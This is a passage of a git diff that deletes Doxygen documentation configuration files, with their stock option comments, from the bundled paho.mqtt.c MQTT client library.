-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal b/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal
deleted file mode 100644
index 5823639..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3ClientInternal
+++ /dev/null
@@ -1,1851 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "MQTT C Client Libraries Internals"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "../doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "../build/output/doc/MQTTClient_internal/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = YES
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = 
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = YES
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
